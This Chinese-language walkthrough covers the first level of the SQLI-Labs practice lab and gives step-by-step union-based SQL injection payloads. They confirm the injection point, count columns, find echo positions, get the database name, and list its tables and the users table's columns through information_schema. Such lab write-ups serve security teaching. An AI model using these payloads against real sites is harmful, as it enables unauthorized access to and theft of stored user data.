第一关:
1.访问SQLI-Labs网站,进入靶场
右键打开检查,进入到Hackbar(火狐插件)输入http://ip/sqli-labs/less-1/?id=1
点击Execute观察页面变化
此时页面显示id=1的用户名Dump、密码Dump。
2.寻找注入点
分别使用以下3条payload寻找注入点及判断注入点的类型:
http://ip/sqli-labs/less-1/?id=1' //报错
http://ip/sqli-labs/less-1/?id=1' and '1'='1 //运行正常
http://ip/sqli-labs/less-1/?id=1' and '1'='2//未正常显示
由上述结果可以判断,网站存在字符型注入点。
3.判断网站查询的字段数
http://ip/sqli-labs/less-1/?id=1' order by 1--+ //正常显示
http://ip/sqli-labs/less-1/?id=1' order by 2--+ //正常显示
http://ip/sqli-labs/less-1/?id=1' order by 3--+ //正常显示
http://ip/sqli-labs/less-1/?id=1' order by 4--+ //报错
由此可知,网站查询的字段数为3。
4.判断网站的回显位置
http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,3--+ //执行结果:2号位和3号位可以回显。
5.获取网站当前所在数据库的库名
http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,database()--+ //显示结果为security。
6.获取数据库security的全部表名
http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name)
from information_schema.tables where table_schema='security'--+
显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。
7.获取users表的全部字段名
http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name)
from information_schema.columns where table_schema='security' and table_name='users'--+